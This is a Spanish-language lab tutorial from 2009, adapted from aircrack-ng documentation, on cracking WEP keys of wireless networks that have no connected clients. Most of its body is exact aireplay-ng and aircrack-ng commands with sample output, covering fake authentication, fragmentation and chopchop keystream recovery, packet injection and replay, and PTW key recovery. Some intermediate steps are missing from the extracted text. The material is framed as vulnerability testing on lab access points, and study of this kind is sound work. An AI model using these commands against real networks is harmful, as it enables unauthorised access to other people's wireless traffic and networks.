Documentos de Académico
Documentos de Profesional
Documentos de Cultura
[TUTORIAL CRACKING WEP] 17 de diciembre de 2009 LABORATORIO PASO A PASO PARA REALIZAR PRUEBAS DE VULNERABILIDAD SOBRE REDES INALMBRICAS
Adaptado por: Siler Amador Donado Tomado de:http://www.aircrack-ng.org/doku.php?id=es:how_to_crack_wep_with_no_clients Equipos usados en este tutorial: Configuracin 1 Direccin MAC de la interfaz eth1: 00:16:CE:07:FC:3E BSSID (direccin MAC del punto de acceso): 00:18:39:BA:4E:0D ESSID (nombre de la red Wireless): hackme1 Canal del AP: 6 Interface Wireless: eth1 Marca del AP: Linksys Configuracin 2 Direccin MAC de la interfaz ra0: 00:13:D3:7B:B9:31 BSSID (direccin MAC del punto de acceso): 00:18:39:BA:4E:0D ESSID (nombre de la red Wireless): hackme1 Canal del AP: 6 Interface Wireless: ra0 Marca del AP: Linksys Configuracin 3 Direccin MAC de la interfaz ra0: 00:13:D3:7B:B9:31 BSSID (direccin MAC del punto de acceso): 00:09:5B:A1:8A:42 ESSID (nombre de la red Wireless): hackme2 Canal del AP: 11 Interface Wireless: ra0 Marca del AP: Netgear Debe obtener la informacin equivalente de la red sobre la que desea trabajar y cambiar los valores anteriores segn corresponda. La siguiente es la configuracin del AP Linksys WRT300N.
Pgina 2
Para garantizar el xito en el desarrollo de este laboratorio suponemos que: Usa el liveCD con la versin 3.1 de la suite wifislax, la puede descargar de http://www.wifislax.org Usa la versin 1.0 de la suite aircrack-ng-1.0, la puede descargar de http://www.aircrackng.org/downloads.html. Luego deber descomprimirla y compilarla de la siguiente forma: wifislax # tar -xvf aircrack-ng-1.0 wifislax # cd aircrack-ng-1.0 wifislax aircrack-ng-1.0 # make wifislax aircrack-ng-1.0 # make strip wifislax aircrack-ng-1.0 # make install Est usando drivers parcheados para inyeccin. Puede capturar paquetes con Wireshark para comprobar si est inyectando. Est suficientemente cerca para enviar y recibir paquetes del AP. Recuerde que recibir paquetes del AP no significa que los paquetes que transmita sean recibidos por el AP, la fuerza de la seal de las tarjetas wireless generalmente es menor que la fuerza de la seal de los AP, por lo tanto, es necesario estar cerca del AP para que los paquetes que transmita sean recibidos por el AP. Debera confirmar que puede comunicare con el AP siguiendo estas instrucciones: wifislax aircrack-ng-1.0 # aireplay-ng -9 ra0 08:15:33 Trying broadcast probe requests... 08:15:35 No Answer... 08:15:35 Found 1 APs 08:15:35 Trying directed probe requests... 08:15:35 00:18:39:BA:4E:0D - channel: 6 - 'hackme1' 08:15:41 Ping (min/avg/max): 1.944ms/145.035ms/194.523ms Power: 0.00 08:15:41 9/30: 30% 08:15:41 Injection is working! Notacin: -9 Signica prueba de intrusin ra0 Interfaz inalmbrica
Pgina 3
Pgina 4
Puede observar que ra0 aparece colocada en modo monitor. Escriba ifconfig ra0 up para levantar la interfaz ra0 que usaremos a continuacin. Para confirmar que la interfaz est bien configurada, escribimos iwconfig. El sistema nos responder: lo ra0 no wireless extensions. RT2500 Wireless ESSID:"" Mode:Monitor Frequency=2.437 GHz Bit Rate=11 Mb/s Tx-Power:0 dBm RTS thr:off Fragment thr:off Encryption key:off Link Quality=0/100 Signal level:-120 dBm Noise level:-79 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 eth0 no wireless extensions. eth1 IEEE 802.11b/g ESSID:off/any Nickname:"Broadcom 4318" Mode:Managed Access Point: Invalid RTS thr:off Fragment thr:off Encryption key:off Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Podemos ver que ra0 est en modo monitor, en la frecuencia 2.437 GHz que corresponde al canal 6 y en Access Point vemos la direccin MAC de nuestra tarjeta wireless. Es importante comprobar toda esta informacin antes de continuar, ya que de lo contrario no funcionar. Para ver la correspondencia entre frecuencia y canal, observe: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels selecciona la etiqueta Wifi Channel Selection and Channel Overlap. As obtendr la frecuencia para cada canal. Problemas Si tiene otra interfaz en modo monitor que no sea ra0, puede usarla o escribir airomon-ng stop raX donde X es la interface que quiere parar. Paso 3 - Usar aireplay-ng para hacer una falsa autenticacin con el AP Este es un paso muy importante. Para que un AP acepte un paquete, la direccin MAC debe estar previamente asociada. Si la direccin MAC con la cual estas inyectando no est asociada, el AP ignorar el paquete y enviar un paquete de desautentificacin. En este caso, no se crearn nuevos IVs porque el AP est ignorando todos los paquetes inyectados. La falta de asociacin con el punto de acceso es la razn ms habitual por la cual falla la inyeccin. Para asociarse con un punto de acceso, usa el comando: wifislax aircrack-ng-1.0 # aireplay-ng -1 0 -e hackme1 -a 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0 Notacin: -1 significa falsa autenticacin (fake authentication) 0 tiempo de reasociacin en segundos -e hackme1 es el nombre de la red wireless -a 00:18:39:BA:4E:0D es la direccin MAC del AP -h 00:13:D3:7B:B9:31 es la direccin MAC de nuestra tarjeta wireless ra0 es el nombre de nuestra interfaz Si tenemos xito aparecer algo como esto:
Pgina 5
Sending Authentication Request Authentication successful Sending Association Request Association successful :-)
Otra variacin que puede funcionar en algunos puntos de acceso: wifislax aircrack-ng-1.0 # aireplay-ng -1 6000 -o 1 -q 10 -e hackme1 -a 00:18:39:BA:4E:0D h 00:13:D3:7B:B9:31 ra0 Notacin: 6000 Reautenticacin cada 6000 segundos. En este periodo de tiempo se siguen enviando paquetes de sigo aqu o keep alive packets. -o 1 Enva solo un tipo de paquetes de cada vez. El valor por defecto es mltiple y esto puede confundir a algunos APs. -q 10 Se envan paquetes de sigo aqu cada 10 segundos. Si tenemos xito aparecer algo como esto: 18:22:32 18:22:32 18:22:32 18:22:32 18:22:42 18:22:52 # etc.... Sending Authentication Request Authentication successful Sending Association Request Association successful :-) Sending keep-alive packet Sending keep-alive packet
Ahora ponemos un ejemplo de un fallo de autenticacin: 18:28:02 18:28:02 18:28:02 18:28:02 18:28:02 18:28:05 18:28:05 18:28:05 18:28:10 18:28:10 18:28:10 Sending Authentication Request Authentication successful Sending Association Request Association successful :-) Got a deauthentication packet! Sending Authentication Request Authentication successful Sending Association Request Sending Authentication Request Authentication successful Sending Association Request
Preste atencin a Got a deauthentication packet y los continuos intentos de asociacin. No se debe continuar al siguiente paso hasta que funcione la falsa autenticacin de forma correcta. Problemas Algunos AP estn configurados para permitir nicamente una direccin MAC para asociarse y conectarse. Si este es su caso, no podr realizar la falsa autenticacin de forma xitosa, salvo que conozca una de las direcciones MAC que estn permitidas para poder conectarse a ese AP. Analice los problemas de filtrado MAC en este tutorial. Si desea confirmar que est asociado de forma correcta puede usar tcpdump y mirar los paquetes. Inicie una consola y escriba: wifislax aircrack-ng-1.0 # tcpdump -n -e -s0 -vvv -i ra0 Si solo desea seleccionar los paquetes de deautenticacin con tcpdump usa: tcpdump -n -e -s0 -vvv -i ra0 | grep DeAuth. Puede cambiar la palabra DeAuth para escoger otros paquetes que desee buscar.
Pgina 6
Paso 4 - Usar chopchop o ataque de fragmentacin para obtener PRGA El objetivo de chopchop y del ataque de fragmentacin es obtener un archivo PRGA (del ingls pseudo random generation algorithm o algoritmo de generacin seudo aleatoria). Este PRGA no es la clave WEP y no se puede usar para descifrar paquetes. Aunque, si puede usarse para crear nuevos paquetes cifrados con la clave WEP para inyectarlos. La creacin de nuevos paquetes la veremos ms adelante en el tutorial. Tanto chopchop como el ataque de fragmentacin pueden ser usados para obtener el archivo PRGA. El resultado es el mismo, por lo que usa el que mejor te funcione. Los pros y contras de cada ataque estn descritos en la pgina de aircrack-ng. A continuacin exponemos primero el ataque de fragmentacin. Abrimos otra consola y escribimos: wifislax aircrack-ng-1.0 # aireplay-ng -5 -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0 Notacin: -5 significa ataque de fragmentacin -b 00:18:39:BA:4E:0D es la direccin MAC del punto de acceso -h 00:13:D3:7B:B9:31 es la direccin MAC de nuestra tarjeta wireless y debe coincidir con la direccin MAC usada en la falsa autenticacin ra0 es el nombre de nuestra interfaz La respuesta que obtendremos ser: Waiting for a data packet... Read 127 packets... Size: 68, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = 01:00:5E:00:00:01 Source MAC = 00:18:39:BA:4E:0B 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0842 0000 0100 5e00 0001 0018 39ba 4e0d .B....^.....9.N. 0018 39ba 4e0b d0b7 579c 2d00 2e3a 422c ..9.N...W.-..:B, eb9c 7df3 c4d7 4b48 75d9 719f 12f2 c8e8 ..}...KHu.q..... b91a 9601 490c a906 74bd ccfc 18d1 8737 ....I...t......7 643a 499b d:I.
Use this packet ? y Cuando recibamos un paquete del punto de acceso, escriba y para continuar. Es probable que sea necesario intentar ms de una vez unos pocos paquetes para tener xito. Si tenemos xito aparecer algo como esto: Saving chosen packet in replay_src-0203-180328.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0203-180343.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Pgina 7
xito! El archivo fragment-0203-180343.xor lo podremos usar en el siguiente paso para generar un paquete arp. Si con el ataque de fragmentacin no hemos tenido xito, podemos probar la tcnica chopchop. Para ello ejecute: wifislax aircrack-ng-1.0 # aireplay-ng -4 ra0 -h 00:13:D3:7B:B9:31 Notacin: -4 significa ataque chopchop -h 00:13:D3:7B:B9:31 es la direccin MAC de nuestra tarjeta wireless y debe coincidir con la direccin MAC usada en la falsa autenticacin ra0 es el nombre de nuestra interfaz La respuesta que obtendremos ser: Read 165 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:40:F4:77:E5:C9 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.." e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i. cfeb 4a72 be46 ..Jr.F
Use this packet ? y Conteste y y el proceso continuar. Saving chosen packet in replay_src-0201-191639.cap Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 80 ( 9% done) | xor = CF | pt = 00 | 152 frames written in 79 (11% done) | xor = 05 | pt = 00 | 29 frames written in 78 (13% done) | xor = 69 | pt = 00 | 151 frames written in 77 (15% done) | xor = CA | pt = 00 | 24 frames written in 76 (17% done) | xor = 65 | pt = 00 | 129 frames written in 75 (19% done) | xor = 9E | pt = 00 | 36 frames written in 74 (21% done) | xor = 72 | pt = 00 | 39 frames written in 73 (23% done) | xor = 01 | pt = 00 | 146 frames written in 72 (25% done) | xor = 71 | pt = 00 | 83 frames written in 71 (26% done) | xor = A1 | pt = 00 | 43 frames written in 70 (28% done) | xor = 3E | pt = 00 | 98 frames written in 69 (30% done) | xor = BB | pt = 00 | 129 frames written in 68 (32% done) | xor = AE | pt = 00 | 248 frames written in 67 (34% done) | xor = FB | pt = 00 | 105 frames written in 66 (36% done) | xor = 43 | pt = 00 | 101 frames written in 65 (38% done) | xor = D4 | pt = 00 | 158 frames written in 64 (40% done) | xor = 16 | pt = 00 | 197 frames written in 760ms 498ms 645ms 483ms 36ms 456ms 87ms 454ms 71ms 387ms 108ms 117ms 438ms 249ms 129ms 294ms 387ms 744ms 315ms 303ms 474ms 591ms
Pgina 8
Pgina 9
Pgina 10
Use this packet ? y Escribimos y para usar este paquete. Veremos cuantos paquetes estamos inyectando y se nos recuerda que iniciemos airodump-ng si no lo hemos hecho todava: Saving chosen packet in replay_src-0204-104917.cap You should also start airodump-ng to capture replies. End of file. Mientras este comando se est ejecutando de forma exitosa, en la ventana de airodump-ng veremos algo similar a esto: CH 6 ][ Elapsed: 16 s ][ 2009-12-12 11:04 BSSID PWR RXQ Beacons 179 #Data, #/s CH MB ENC CIPHER AUTH ESSID 2689 336 6 11 WEP WEP hackme1
Pgina 11
Puedes observar que solo hay un punto de acceso puesto que hemos incluido en airodump-ng el filtro para limitar la captura a un nico BSSID. Tambin observa que los paquetes de la tarjeta son aproximadamente los mismos que los paquetes (data) del BSSID. Esto significa que la inyeccin est funcionando bien y se pierden pocos paquetes. Tambin observa la velocidad de inyeccin (#/s) de 336 paquetes por segundo, lo cual es un indicador de que la inyeccin est funcionando muy bien. Esta es una situacin ideal de inyeccin. Problemas Si los paquetes del BSSID (data) no aumentan asegurate de que estas todava asociado con el punto de acceso. Para hacer esto, mira las instrucciones sobre tcpdump en el paso 2. Paso 8 - Ejecutar aircrack-ng para obtener la clave WEP Inicia otra consola y escribe: wifislax aircrack-ng-1.0 # aircrack-ng -z -b 00:18:39:BA:4E:0D capture*.cap Notacin: -z significa que se use el mtodo PTW para obtener ms rpido la clave WEP capture*.cap selecciona todos los archivos que comienzan por capture y con extensin cap. -b 00:14:6C:7E:40:80 selecciona el punto de acceso en el que estamos interesados Puede ejecutar aircrack-ng mientras captura paquetes. En poco tiempo, ver la clave WEP. Usando el mtodo PTW, necesitar alrededor de 20,000 paquetes de datos para una clave de 64 bit y 40,000 para claves de 128 bit. Recuerda que el mtodoPTW solo funciona con paquetes ARP. Como este tutorial solo cubre este tipo de paquetes no tendrs problema ninguno. El otro requerimiento es que has de capturar con airodump archivos *.cap, lo que significa que no puedes usar laopcin - -ivs. Si no usas la opcin -z, se aplicar el mtodo FMS/Korek. Necesitars aproximadamente 250,000 IVs para una clave WEP de 64 bit y 1,500,000 IVs para claves de 128 bit. Esto es aproximado y hay muchas variables que influyen en el nmero de IVs necesarios para obtener la clave WEP. Problemas Algunas veces es recomendable probar varias tcnicas para obtener la clave WEP rpidamente. Prueba la opcin -n para fijar la longitud de la clave (por ejemplo -n 64). Usa -f y prueba diferentes fudge factors. Usa -k y prueba a desabilitar los mtodos korek. Solucin alternativa Existe un pequeo engao que simplifica el crackeo de la clave WEP sin clientes. Bsicamente consiste en recoger cualquier paquete broadcast del punto de acceso y convertirlo para que el punto de acceso genere un nuevo IV. Es importante que tenga en cuenta que si usa este truco, no podr utilizar la opcin -z del mtodo PTW con aircrack-ng. Esto se debe a que el mtodo PTW requiere paquetes arp y de esta forma no los generamos. OK, ahora se estar preguntando por qu no usamos esta tcnica paso a paso? La razn es que con esta tcnica se reenvan todos los paquetes que reciba. Por lo que si recibe un paquete de 1000 byte entonces reenviara 1000 bytes. Esto reduce de forma muy importante el nmero de paquetes capturados por segundo. Aunque, como ventaja podemos destacar que es muy simple y muy fcil de hacer. Adems puede que tenga suerte y que reciba un paquete muy pequeo para reenviar. En este caso, esta tcnica funcionar tan bien como la descrita con anterioridad en este tutorial. Hay que tener en cuenta las mismas consideraciones y realizar con anterioridad una falsa autenticacin. Escriba el siguiente comando:
Pgina 12
Use this packet ? y Escriba y para seleccionar el paquete y empezar la inyeccin. Recuerd e, cuanto ms pequeo sea el paquete mucho mejor. Al empezar la inyeccin vers algo como esto: Saving chosen packet in replay_src-0411-145110.cap Sent 10204 packets...(455 pps) Si aun no has iniciado airodump-ng, ejectalo ahora. Una vez que tengas suficientes IVs, puedes iniciar aircrack-ng e intentar averiguar la clave WEP. Otra variacin de este ataque es usar paquetes de una captura anterior. Debes de tener guardados los paquetes enteros, y no solo los IVs. A continuacin puedes ver cmo sera el comando: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 -r capture01.cap ra0 Donde -r capture-01.cap es el archivo de una captura anterior. Referencias 1. http://www.nextgameday.com/foro/f105/tutorial-auditoria-wireless-wifislax-saca-claves-wep-deredes-inalambricas-56761/ 2. http://archive.aircrack-ng.org/slitaz/ 3. http://www.aircrack-ng.org/doku.php?id=es:newbie_guide 4. http://www.aircrack-ng.org/doku.php?id=es:how_to_crack_wep_with_no_clients 5. http://www.aircrack-ng.org/documentation.html 6. http://www.aircrack-ng.org/downloads.html 7. http://www.aircrack-ng.org/ 8. http://www.wifislax.org/
Pgina 13